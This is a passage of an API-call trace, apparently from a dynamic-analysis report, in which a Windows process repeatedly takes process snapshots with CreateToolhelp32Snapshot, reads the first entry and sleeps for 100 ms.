out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.898] Sleep (dwMilliseconds=0x64) [0253.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x654 [0254.000] Process32FirstW (in: hSnapshot=0x654, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.008] Sleep (dwMilliseconds=0x64) [0254.108] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x658 [0254.109] Process32FirstW (in: hSnapshot=0x658, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.115] Sleep (dwMilliseconds=0x64) [0254.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x65c [0254.218] Process32FirstW (in: hSnapshot=0x65c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.224] Sleep (dwMilliseconds=0x64) [0254.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x660 [0254.327] Process32FirstW (in: hSnapshot=0x660, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.333] Sleep (dwMilliseconds=0x64) [0254.435] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x664 [0254.436] Process32FirstW (in: hSnapshot=0x664, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.442] Sleep (dwMilliseconds=0x64) [0254.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x668 [0254.546] Process32FirstW (in: hSnapshot=0x668, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.551] Sleep (dwMilliseconds=0x64) [0254.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x66c [0254.655] Process32FirstW (in: hSnapshot=0x66c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.661] Sleep (dwMilliseconds=0x64) [0254.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x670 [0254.764] Process32FirstW (in: hSnapshot=0x670, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.770] Sleep (dwMilliseconds=0x64) [0254.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x674 [0254.873] Process32FirstW (in: hSnapshot=0x674, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.879] Sleep (dwMilliseconds=0x64) [0254.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x678 [0254.983] Process32FirstW (in: hSnapshot=0x678, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.989] Sleep (dwMilliseconds=0x64) [0255.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x67c [0255.093] Process32FirstW (in: hSnapshot=0x67c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.098] Sleep (dwMilliseconds=0x64) [0255.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x680 [0255.201] Process32FirstW (in: hSnapshot=0x680, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.209] Sleep (dwMilliseconds=0x64) [0255.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x684 [0255.310] Process32FirstW (in: hSnapshot=0x684, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.318] Sleep (dwMilliseconds=0x64) [0255.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x688 [0255.420] Process32FirstW (in: hSnapshot=0x688, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.425] Sleep (dwMilliseconds=0x64) [0255.527] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x68c [0255.529] Process32FirstW (in: hSnapshot=0x68c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.534] Sleep (dwMilliseconds=0x64) [0255.636] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x690 [0255.638] Process32FirstW (in: hSnapshot=0x690, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.644] Sleep (dwMilliseconds=0x64) [0255.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x694 [0255.747] Process32FirstW (in: hSnapshot=0x694, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.753] Sleep (dwMilliseconds=0x64) [0255.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x698 [0255.860] Process32FirstW (in: hSnapshot=0x698, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.868] Sleep (dwMilliseconds=0x64) [0255.964] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x69c [0255.966] Process32FirstW (in: hSnapshot=0x69c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.971] Sleep (dwMilliseconds=0x64) [0256.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6a0 [0256.075] Process32FirstW (in: hSnapshot=0x6a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.083] Sleep (dwMilliseconds=0x64) [0256.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6a4 [0256.184] Process32FirstW (in: hSnapshot=0x6a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.192] Sleep (dwMilliseconds=0x64) [0256.296] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6a8 [0256.298] Process32FirstW (in: hSnapshot=0x6a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.304] Sleep (dwMilliseconds=0x64) [0256.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6ac [0256.402] Process32FirstW (in: hSnapshot=0x6ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.407] Sleep (dwMilliseconds=0x64) [0256.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6b0 [0256.511] Process32FirstW (in: hSnapshot=0x6b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.517] Sleep (dwMilliseconds=0x64) [0256.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6b4 [0256.621] Process32FirstW (in: hSnapshot=0x6b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.626] Sleep (dwMilliseconds=0x64) [0256.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6b8 [0256.730] Process32FirstW (in: hSnapshot=0x6b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.736] Sleep (dwMilliseconds=0x64) [0256.838] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6bc [0256.840] Process32FirstW (in: hSnapshot=0x6bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.847] Sleep (dwMilliseconds=0x64) [0256.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6c0 [0256.948] Process32FirstW (in: hSnapshot=0x6c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.954] Sleep (dwMilliseconds=0x64) [0257.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6c4 [0257.060] Process32FirstW (in: hSnapshot=0x6c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.066] Sleep (dwMilliseconds=0x64) [0257.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6c8 [0257.166] Process32FirstW (in: hSnapshot=0x6c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.172] Sleep (dwMilliseconds=0x64) [0257.274] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6cc [0257.275] Process32FirstW (in: hSnapshot=0x6cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.281] Sleep (dwMilliseconds=0x64) [0257.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d0 [0257.385] Process32FirstW (in: hSnapshot=0x6d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.390] Sleep (dwMilliseconds=0x64) [0257.493] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d4 [0257.494] Process32FirstW (in: hSnapshot=0x6d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.500] Sleep (dwMilliseconds=0x64) [0257.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d8 [0257.603] Process32FirstW (in: hSnapshot=0x6d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.609] Sleep (dwMilliseconds=0x64) [0257.711] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6dc [0257.713] Process32FirstW (in: hSnapshot=0x6dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.718] Sleep (dwMilliseconds=0x64) [0257.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6e0 [0257.822] Process32FirstW (in: hSnapshot=0x6e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.828] Sleep (dwMilliseconds=0x64) [0257.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6e4 [0257.932] Process32FirstW (in: hSnapshot=0x6e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.938] Sleep (dwMilliseconds=0x64) [0258.038] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6e8 [0258.040] Process32FirstW (in: hSnapshot=0x6e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.046] Sleep (dwMilliseconds=0x64) [0258.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6ec [0258.149] Process32FirstW (in: hSnapshot=0x6ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.155] Sleep (dwMilliseconds=0x64) [0258.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6f0 [0258.258] Process32FirstW (in: hSnapshot=0x6f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.264] Sleep (dwMilliseconds=0x64) [0258.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6f4 [0258.368] Process32FirstW (in: hSnapshot=0x6f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.373] Sleep (dwMilliseconds=0x64) [0258.478] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6f8 [0258.479] Process32FirstW (in: hSnapshot=0x6f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.485] Sleep (dwMilliseconds=0x64) [0258.584] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6fc [0258.586] Process32FirstW (in: hSnapshot=0x6fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.592] Sleep (dwMilliseconds=0x64) [0258.694] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x700 [0258.695] Process32FirstW (in: hSnapshot=0x700, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.701] Sleep (dwMilliseconds=0x64) [0258.803] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x704 [0258.804] Process32FirstW (in: hSnapshot=0x704, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.810] Sleep (dwMilliseconds=0x64) [0258.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x708 [0258.914] Process32FirstW (in: hSnapshot=0x708, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.920] Sleep (dwMilliseconds=0x64) [0259.023] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x70c [0259.024] Process32FirstW (in: hSnapshot=0x70c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.030] Sleep (dwMilliseconds=0x64) [0259.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x710 [0259.140] Process32FirstW (in: hSnapshot=0x710, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.146] Sleep (dwMilliseconds=0x64) [0259.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x714 [0259.257] Process32FirstW (in: hSnapshot=0x714, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.262] Sleep (dwMilliseconds=0x64) [0259.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x718 [0259.366] Process32FirstW (in: hSnapshot=0x718, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.372] Sleep (dwMilliseconds=0x64) [0259.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x71c [0259.475] Process32FirstW (in: hSnapshot=0x71c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.481] Sleep (dwMilliseconds=0x64) [0259.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x720 [0259.585] Process32FirstW (in: hSnapshot=0x720, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.590] Sleep (dwMilliseconds=0x64) [0259.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x724 [0259.694] Process32FirstW (in: hSnapshot=0x724, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.699] Sleep (dwMilliseconds=0x64) [0259.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x728 [0259.803] Process32FirstW (in: hSnapshot=0x728, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.809] Sleep (dwMilliseconds=0x64) [0259.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x72c [0259.912] Process32FirstW (in: hSnapshot=0x72c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.918] Sleep (dwMilliseconds=0x64) [0260.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x730 [0260.022] Process32FirstW (in: hSnapshot=0x730, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.027] Sleep (dwMilliseconds=0x64) [0260.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x734 [0260.131] Process32FirstW (in: hSnapshot=0x734, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.136] Sleep (dwMilliseconds=0x64) [0260.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x738 [0260.240] Process32FirstW (in: hSnapshot=0x738, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.246] Sleep (dwMilliseconds=0x64) [0260.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x73c [0260.349] Process32FirstW (in: hSnapshot=0x73c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 